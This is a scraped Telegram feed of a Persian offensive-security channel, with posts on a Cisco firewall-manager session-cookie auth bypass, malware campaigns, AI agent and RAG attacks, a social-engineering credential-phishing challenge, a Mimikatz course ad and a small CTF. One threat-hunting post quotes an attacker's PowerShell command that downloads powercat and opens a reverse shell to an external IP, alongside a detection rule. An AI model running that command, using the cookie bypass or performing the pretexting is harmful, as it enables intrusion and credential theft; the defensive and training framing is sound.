Try Hack Box
6.39K subscribers
724 photos
69 videos
134 files
735 links
1 Nov 2020
1399/08/11


🔴 THB | Offensive Security

آموزش، تحقیق و تجربه عملی در امنیت تهاجمی

Penetration Testing · Red Teaming · AI Security

🎯 یاد بگیر. آزمایش کن. حرفه‌ای شو.
Download Telegram
Live stream finished (1 hour)
قسمت هشتم زیرو تاک - رادیو زیرو پاد
@TryHackBox | @RadioZeroPod
⭕️ قسمت هشتم زیرو تاک

📌 موضوع جلسه : مقدمه‌ای بر Red Teaming و جایگاه Malware در فرآیند حمله + تحلیل استاتیک بدافزار

🎙 مهمان برنامه : مهندس پیمان خدابنده

منتظر جلسه بعدی باشید.

🎤 راهبر گفتگوی امنیتی : حسین نائیجی

🆔
@RadioZeroPod
🆔
@TryHackBox
🆔
@TryHackBoxOfficial
🆔
@TryHackBoxStory
7🔥3
بایپس احراز هویت از طریق Forged Session Cookie

(مرکز مدیریت فایروال امن سیسکو)

تحلیل:
- فقط وجود کوکی CGISESSID را بررسی می‌کند.
- اما بررسی نمی‌ کند که آیا شناسه سشن معتبر، فعال و مرتبط با یک کاربر احراز هویت شده است یا خیر.

تاثیر:
یک مهاجم می‌ تواند یک مقدار دلخواه یا پیش‌ فرض مانند csm_processes را ارائه دهد تا از هدایت به صفحه /ui/login جلوگیری کند و به منابع محافظت‌ شده دسترسی غیرمجاز پیدا کند.

پس اگر واقعاً از خواندن مطالب این‌چنینی لذت میبرید، لطفاً حمایت خود را نشان دهید 🔥

@TryHackBox
🔥24👍21
چهار گروه بدافزار، پلیس پاکستان را با استفاده از PlugX، ShadowPad، Remcos و Cobalt Strike مورد هدف قرار دادند.

محققان امنیت سایبری، جزئیاتی از فعالیت‌های جاسوسی سایبری مداوم علیه چندین سازمان پلیس پاکستان را فاش کردند. این فعالیت‌ها توسط گروه‌هایی از هکرها انجام شده است که احتمالاً با چین و هند مرتبط هستند، و این حملات از فوریه 2024 تا آوریل 2026 ادامه داشته است.

https://thehackernews.com/2026/07/hackers-weaponize-balochistan-police.html

@RadioZeroPod
@TryHackBoxStory
@TryHackBoxOfficial
@TryHackBox
6
در حال تشکیل یک تیم داوطلبانه کوچک برای توسعه یک پلتفرم در حوزه امنیت سایبری هستیم. پروژه در مرحله شروع قرار داره و می‌خوایم اعضای اصلی تیم رو از همین ابتدا کنار هم جمع کنیم تا مسیر رشد پروژه رو با هم بسازیم.

در حال حاضر، برای این نقش‌ ها به‌ صورت مشخص نیاز داریم:

- Front-end Development

- Back-end Development
- Database
- DevOps و Cloud

اگر در یکی از این حوزه‌ ها فعالیت میکنید یا میخواید روی یک پروژه واقعی تجربه بگیرید، خوشحال میشویم باهم صحبت کنیم.

چرا این همکاری می‌تونه ارزشمند باشه؟

تجربه عملی کار روی یک پروژه واقعی، از ایده تا انتشار

همکاری با یک تیم هدفمند در حوزه امنیت سایبری و توسعه نرم‌افزار

ثبت نقش شما در صفحه تیم پروژه (Contributor/Team Member)

گواهی همکاری پس از مشارکت مؤثر

امکان استفاده از پروژه در رزومه، LinkedIn و GitHub

اولویت برای همکاری‌ های بلندمدت در صورت رشد پروژه


این همکاری در حال حاضر داوطلبانه است. هدف ما در این مرحله، ساخت یک محصول حرفه‌ای و کسب تجربه و سابقه کاری واقعی برای همه اعضای تیمه.


🔴 جهت ارتباط با ما به پشتیبانی پیام دهید :

@ThbxSupport
👍6👎6
Hacking Scada TryHackBox.pdf
936.6 KB
هک سیستم ‌های SCADA : پیداکردن سیستم ‌های SCADA با استفاده از Censys

همانطور که می‌دانید، سیستم ‌های SCADA/ICS در سراسر جهان به طور مداوم مورد حمله قرار می‌گیرند. این سیستم ‌های صنعتی هستند که در برخی موارد، می‌توانند بر اقتصاد یک کشور تأثیر بگذارند و هدف اصلی در هر جنگ سایبری محسوب می ‌شوند. پیداکردن آن‌ ها با استفاده از ابزارهای مختلف (nmap / Shodan / و غیره) نسبتاً آسان است.

اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید.
@TryHackBox
@TryHackBoxofficial
🔥279👍3👎1
📌 برگزاری جلسه ویس چت : 

با درود خدمت دوستان و همراهان عزیز، 
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسه‌ای تخصصی و آموزشی در خصوص زمینه SOC به صورت ویس چت برگزار کنیم.

🎙 مهمان ویژه: 
👤 مهندس : مهتاب کسائی

📅 زمان برگزاری: امشب
📍 پلتفرم: ویس چت تلگرام
🕗 ساعت : 20:00
🔖  لینک جلسه :


🎙 قسمت اول
⁉️ موضوعات ما :

◾️زندگی روزمره یک SOC Analyst/Security Engineer
🔔 نکته مهم: 
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .


🆔
@RadioZeroPod
🆔
@TryHackBox
7👎5🔥2👏1
Live stream started
Live stream finished (1 hour)
Please open Telegram to view this post
VIEW IN TELEGRAM
🧩 گاهی اوقات، مجرمان سایبری تمایل دارند که دستگیر شوند. بیایید یک مثال دیگر و ابزاری را بررسی کنیم که من کمتر در حملات واقعی با آن مواجه شده‌ام.

🔖 طبق این
گزارش، مهاجم از PowerShell برای دانلود و اجرای PowerCat استفاده کرده است

یک ابزار متن‌باز، مشابه Netcat، برای اجرای یک شل معکوس:

powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString (‘hxxps://raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1’); powercat -c 154.17.26[.]41 -p 8080 -e cmd

همانطور که متوجه شدید، مهاجم نام ابزار را تغییر نداده است. و در بسیاری از موارد، این یک رویه رایج است. همین موضوع در مورد مخازن نیز صدق می‌کند.
مجرمان اغلب از PowerShell برای دانلود ابزارها از منابع رسمی استفاده می‌ کنند.

بنابراین، این یک نکته مهم دیگر است که باید مستند شود و در هنگام جستجوی فعال و ایجاد منطق تشخیص، در نظر گرفته شود، به عنوان مثال:
event_type: "processcreatewin"

AND

cmdline: "powercat"

فراموش نکنید که بلوک‌ های اسکریپت نیز حاوی خطوط و توابع جالب زیادی هستند، فقط خود اسکریپت را بررسی کنید.

اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید.

@TryHackBox
@TryHackBoxofficial
@AiTHB
@RadioZeroPod
🔥201
ا 🔖 : AI Agent Kill Chain را میتوان در هشت مرحله درک کرد.

ا▪️ :  AI agent ها فقط چت‌ بات نیستند.

آنها میتوانند استدلال کنند، برنامه‌ ریزی کنند، ابزارها را فراخوانی کنند، به داده‌ ها دسترسی پیدا کنند، با APIها تعامل داشته باشند و در سیستم‌ های متصل، اقداماتی انجام دهند. این قابلیت، یک سطح حمله‌ی جدید و یک kill chain جدید ایجاد می‌ کند.

درس کلیدی ساده است: AI agentها هرگز نباید مثل اپلیکیشن‌ های معمولی در نظر گرفته شوند.

آنها به دسترسی سخت‌گیرانه‌ی least-privilege، تأیید انسانی برای اقدامات پرریسک، tool allowlists، اجرای ایزوله (isolated execution)، credentials کوتاه‌ مدت، دفاع در برابر prompt injection و ثبت کامل audit logging نیاز دارند.

با گسترش استفاده‌ی سازمانها از agentic AI، فقط ایمن‌ سازی مدل کافی نخواهد بود.

باید خودِ agent، identity آن، tools آن، memory آن، داده‌هایش و هر سیستمی که به آن دسترسی دارد را ایمن کنید.


🔥 اولین کانال فارسی زبان در AI Security .

@TryHackBox
@RadioZeroPod
@AiTHB
@TryHackBoxOfficial
6
سری چالش های SE : هک انسان 1/20

📌 چالش : "تماس IT پشتیبانی"

سناریو:

شما درحال مهندسی اجتماعی هستید و هدفتون دسترسی به اطلاعات داخلی یک شرکت فرضی به نام "Datanova" هست. شما به عنوان یک "کارمند پشتیبانی IT" با خانم/آقای میترا شاهینی، منشی بخش مالی، تماس می‌گیرید.

📌 هدف: گرفتن یوزرنیم و ریست پسورد ایمیلش (بدون اینکه شک کنه).

📓 اطلاعات از پیش:

شما اسم مدیرش (سهراب فریدونی) رو از لینکدین پیدا کردید.

می‌دونید شرکت هفته پیش یک آپدیت سیستمی داشته.

میترا معمولاً ساعت ۹ صبح سرکاره.

سوال:

> شما چه دیالوگ و استراتژی‌ ای برای این تماس استفاده می‌ کنید تا میترا بهتون اعتماد کنه؟ (متن دقیق مکالمه یا حداقل ۳-۴ تاکتیکی که به کار می‌برید رو تو کامنت بنویسید).



⚠️ این چلنج فقط برای آموزش تشخیص و دفاع در برابر مهندسی اجتماعیه، نه اجرای واقعی روی افراد یا سازمانهای واقعی

@TryHackBox
#مهندسی_اجتماعی
5👍1
معماری RAG: طراحی، امنیت و حملات

RAG (Retrieval-Augmented Generation) یک معماری ترکیبی است که بازیابی اطلاعات (Retrieval) را با تولید زبان طبیعی (Generation) ادغام می‌کند تا پاسخ‌های دقیق‌تر و مبتنی بر داده تولید کند.

اجزای اصلی معماری

1. Query Encoder: تبدیل پرسش کاربر به Vector Embedding معنایی.
2. Retriever: جستجو در Vector Database (مانند FAISS یا ChromaDB) برای یافتن اسناد مرتبط.
3. Generator: مدل زبانی (مانند GPT یا BART) که پاسخ را بر اساس اسناد بازیابی‌شده تولید می‌کند.
4. Knowledge Base: مخزن خارجی اسناد متنی که دانش سیستم را به‌روز نگه می‌دارد.

فرآیند عملیاتی

کاربر سوال می‌پرسد → سوال به بردار تبدیل می‌شود → Retriever اسناد مرتبط را بازیابی می‌کند → Generator پاسخ نهایی را تولید می‌کند.

حملات رایج به RAG

1. Knowledge Poisoning: تزریق داده‌های مخرب به پایگاه دانش برای انحراف پاسخ‌ها.
2. Indirect Prompt Injection: دستکاری ورودی کاربر برای تغییر رفتار Retriever یا Generator.
3. Cross-Tenant Leakage: دسترسی غیرمجاز به داده‌های کاربران دیگر در سیستم‌های چندمستاجره.

چالش‌های امنیتی

- Data Integrity: اطمینان از صحت و اعتبار اسناد بازیابی‌شده.
- Access Control: جلوگیری از دسترسی به داده‌های حساس یا طبقه‌بندی‌شده.
- Hallucination Mitigation: کاهش توهم‌های مدل با استفاده از منابع معتبر.

معماری RAG با ترکیب Semantic Search و Language Generation، پل میان دانش خارجی و قدرت تولید مدل‌های زبانی است، اما نیازمند لایه‌های دفاعی چندگانه برای مقابله با حملات نوظهور است.

🔥 اولین کانال فارسی زبان در AI Security .

@TryHackBox
@RadioZeroPod
@AiTHB
@TryHackBoxOfficial
5
Forwarded from Try Hack Box
Media is too big
VIEW IN TELEGRAM
📌 دوره: راهنمای جامع ابزار Mimikatz

💢 توضیحات دوره: Mimikatz بدون شک یکی از مهم‌ ترین و موثرترین ابزارهایی است که در دنیای امنیت سایبری و عملیات تیم قرمز مورد استفاده قرار می‌ گیرد.این ابزار توسط برنامه‌ نویس فرانسوی Benjamin Delpy ایجاد شد.او در ابتدا Mimikatz را برای یادگیری عمیق‌ تر زبان C و درک بهتر مکانیزم‌ های امنیتی ویندوز توسعه داد.

این ابزار با بهره‌ برداری هوشمند از ضعف‌ های موجود در معماری ویندوز،مجموعه‌ای از حملات مهم و پرکاربرد را به صورت یکپارچه و آماده ارائه می‌ دهد. Mimikatz کار را برای متخصصان بسیار آسان‌ تر کرده است؛به شکلی که بدون نیاز به دانش بسیار تخصصی از ساختارهای داخلی،می‌ توان از آن برای گسترش دسترسی در شبکه‌ های مبتنی بر ویندوز استفاده کرد.این ابزار همچنان فعالانه به‌ روزرسانی می‌شود و تکنیک‌ های جدید به آن اضافه می‌ گردد.


📌 توضیحات کامل

مدرس : مهندس سجاد تیموری
مدت زمان دوره : ۵ ساعت ۲۰ دقیقه
دوره : آفلاین
دوره دارای گروه پشتیبانی می باشد.

💰 قیمت :     ۲,۰۰۰,۰۰۰  تومان
💰 با تخفیف ویژه : ۱,۲۵۰,۰۰۰ تومان

📌 جهت خرید،به ایدی زیر پیام دهید:

@ThbxSupport
Group
@TryHackBox
👍3👎2
دوستان اگر علاقه مند به فعالیت در تیم ما هستید البته به صورت داوطلب ، پیام دهید :
@ThbxSupport
👎3
TryHackBox CTF 1.zip
26.5 KB
TryHackBox #CTF #1
سطح : خیلی آسان
یه چالش امنیت سایبری آماده کردیم! دو فایل زیر رو دانلود کنید و فلگ رو پیدا کنید 👇

/ TryHackBox CTF 1.Zip
|
| __ tryhackbox_challenge.png
|_ _ challenge.zip

راهنمای چالش:

۱. فایل challenge.zip رمزدار هست.
۲. رمز داخل فایل tryhackbox_challenge.png هست دقت کنید که همه‌ چیز تو یه عکس همیشه فقط ظاهرش نیست .
۳. وقتی زیپ رو باز کردید، داخلش یه متن هست که هنوز فلگ نهایی نیست یه مرحله دیکد دیگه لازمه.
فرمت فلگ:
TryHackBox{...}


ارسال فلگ به :
@Unique_exploitbot

#CTF #TryHackBox #CyberSecurity

@TryHackBox
2
فراخوان همکاری داوطلبانه طراح UI/UX

در حال توسعه یک پلتفرم آموزشی امنیت سایبری هستیم و برای تکمیل تیم، از یک طراح UI/UX دعوت می‌کنیم به‌صورت داوطلبانه در کنار ما همکاری کند.

هدف ما طراحی یک رابط کاربری مدرن، ساده و کاربرپسند است که تجربه‌ای حرفه‌ای برای کاربران و علاقه‌مندان حوزه امنیت سایبری فراهم کند.

مهارت‌های موردنیاز

تسلط بر طراحی رابط کاربری (UI)

آشنایی با اصول تجربه کاربری (UX)

توانایی کار با Figma یا ابزارهای مشابه

طراحی صفحات ریسپانسیو و مدرن

آشنایی با Design System و Componentها

اگر به ساخت یک پروژه واقعی، توسعه رزومه و همکاری در کنار یک تیم فعال در حوزه امنیت سایبری علاقه‌مند هستید، خوشحال می‌شویم در کنار ما باشید.

مزایای همکاری


ثبت نام و نقش شما در تیم پروژه و معرفی در بخش همکاران (پس از انتشار)

ساخت نمونه‌کار (Portfolio) واقعی و قابل ارائه

دریافت گواهی همکاری پس از مشارکت مؤثر در پروژه

اولویت برای همکاری‌ های آینده و پروژه‌های تجاری و درآمدزا

امکان شبکه‌ سازی

مشارکت در ساخت محصولی که توسط هزاران کاربر مورد استفاده قرار خواهد گرفت

این همکاری در حال حاضر داوطلبانه است و هدف، ساخت یک پلتفرم آموزشی ارزشمند برای جامعه امنیت سایبری است. اعضای اولیه تیم، نقش مهمی در شکل‌گیری و توسعه آینده این پروژه خواهند داشت و در صورت تبدیل پروژه به یک فعالیت تجاری، اعضای فعال تیم در اولویت همکاری‌ های بعدی خواهند بود.

در صورت تمایل به همکاری، لطفاً از طریق پیام خصوصی با ما در ارتباط باشید.

@ThbxSupport
5